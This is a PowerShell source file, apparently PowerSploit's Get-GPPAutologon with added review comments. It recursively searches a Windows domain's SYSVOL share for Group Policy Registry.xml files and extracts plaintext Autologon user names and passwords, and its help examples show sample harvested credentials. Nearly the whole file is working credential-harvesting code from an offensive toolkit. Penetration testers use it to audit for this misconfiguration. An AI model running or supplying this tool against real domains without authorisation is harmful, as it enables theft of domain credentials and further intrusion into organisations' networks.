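function Get-GPPAutologon
{
<#
.SYNOPSIS

    Retrieves passwords from Autologon entries that are pushed through Group Policy Registry Preferences.

    PowerSploit Function: Get-GPPAutologon
    Author: Oddvar Moe (@oddvarmoe)
    Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work!
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None

.DESCRIPTION

    Get-GPPAutologon recursively searches SYSVOL on the domain controller (or a caller-supplied
    directory) for Registry.xml Group Policy Preference files. For every file that mentions both a
    DefaultUserName and a DefaultPassword entry it returns the user name(s), the password(s) and the
    path of the file they came from.

    The values are read verbatim from the XML - there is no decryption step - so every object this
    function emits carries plaintext credentials. Treat the output accordingly: PowerShell transcripts,
    host logging and anything the pipeline is redirected to will contain them.

    Directories that cannot be read are skipped silently (-ErrorAction SilentlyContinue); a file that
    fails to parse produces a non-terminating error and the search continues with the next file.

.PARAMETER Path

    Root directory to search. Defaults to \\<USERDNSDOMAIN>\SYSVOL. When a Path is supplied explicitly
    (for example an offline copy of SYSVOL) the domain-membership check is skipped, because that check
    only exists to make sure the default path can be built.

.EXAMPLE

    PS C:\> Get-GPPAutologon

    UserNames File Passwords
    --------- ---- ---------
    {administrator} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3}
    {NormalUser} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword}

.EXAMPLE

    PS C:\> Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq

    password
    password12
    password123
    password1234
    password1234$
    read123
    Recycling*3ftw!

.OUTPUTS

    PSObject with the properties UserNames, Passwords (each an array of strings, or the literal string
    '[BLANK]' when the file contained no such entry) and File (full path of the Registry.xml).

.LINK

    https://support.microsoft.com/nb-no/kb/324737
#>

    [CmdletBinding()]
    Param (
        [String]
        $Path = "\\$Env:USERDNSDOMAIN\SYSVOL"
    )

    #Some XML issues between versions
    Set-StrictMode -Version 2
    # Inherited from Get-GPPPassword; nothing in this function appears to use a System.Core type.
    # Kept to avoid changing load-time behaviour - TODO(review): confirm and drop.
    [System.Reflection.Assembly]::LoadWithPartialName("System.Core") | Out-Null

    #define helper function to parse the DefaultUserName / DefaultPassword fields from one Registry.xml
    function Get-GPPInnerFields
    {
        [CmdletBinding()]
        Param (
            # Full path of the Registry.xml to inspect.
            $File
        )

        try
        {
            # Get-Content yields one string per line; the [xml] cast joins and parses them.
            # NOTE(review): the file comes from a share other principals can write to - confirm how
            # this cast treats DTDs / external entities before pointing it at untrusted input.
            [xml] $Xml = Get-Content ($File)

            #declare empty arrays
            $Password = @()
            $UserName = @()

            # Cheap pre-filter: only files that mention both keys are worth walking element by element.
            # -like is case-insensitive, as is the switch below.
            if (($Xml.InnerXml -like "*DefaultPassword*") -and ($Xml.InnerXml -like "*DefaultUserName*"))
            {
                # Every registry preference item has a <Properties ...> element whose name/Value members
                # (attribute access via the XML adapter) identify the registry value and its data.
                foreach ($Prop in $Xml.GetElementsByTagName("Properties"))
                {
                    switch ($Prop.name)
                    {
                        'DefaultPassword'
                        {
                            # Unary comma wraps the element so the pipeline hands Select-Object the
                            # element itself rather than anything it may enumerate to.
                            $Password += (, $Prop | Select-Object -ExpandProperty Value)
                        }

                        'DefaultUserName'
                        {
                            $UserName += (, $Prop | Select-Object -ExpandProperty Value)
                        }
                    }
                }

                # Report once per file, not once per Properties element.
                Write-Verbose "Potential password in $File"
            }

            #put [BLANK] in variables that collected nothing so the output stays readable/sortable
            if (!($Password))
            {
                $Password = '[BLANK]'
            }

            if (!($UserName))
            {
                $UserName = '[BLANK]'
            }

            Write-Verbose "The password is between {} and may be more than one value."

            #Create custom object to output results (hashtable order is not guaranteed on PowerShell 2.0)
            $ObjectProperties = @{'Passwords' = $Password;
                                  'UserNames' = $UserName;
                                  'File'      = $File}

            New-Object -TypeName PSObject -Property $ObjectProperties
        }
        catch { Write-Error $_ }
    }

    try {
        if (-not $PSBoundParameters.ContainsKey('Path')) {
            #ensure that machine is domain joined and script is running as a domain account;
            #without USERDNSDOMAIN the default \\<domain>\SYSVOL path cannot be resolved
            if ( ( ((Get-WmiObject Win32_ComputerSystem).PartOfDomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
                throw 'Machine is not a domain member or User is not a member of the domain.'
            }
        }

        #discover potential registry.xml containing autologon passwords.
        #-Path is required: without it Get-ChildItem walks the current directory, not SYSVOL.
        Write-Verbose "Searching $Path for Registry.xml. This could take a while."
        $XmlFiles = Get-ChildItem -Path $Path -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml'

        if ( -not $XmlFiles ) {throw 'No preference files found.'}

        Write-Verbose "Found $(@($XmlFiles).Count) files that could contain passwords."

        foreach ($File in $XmlFiles) {
            Get-GPPInnerFields $File.FullName
        }
    }

    catch { Write-Error $_ }
}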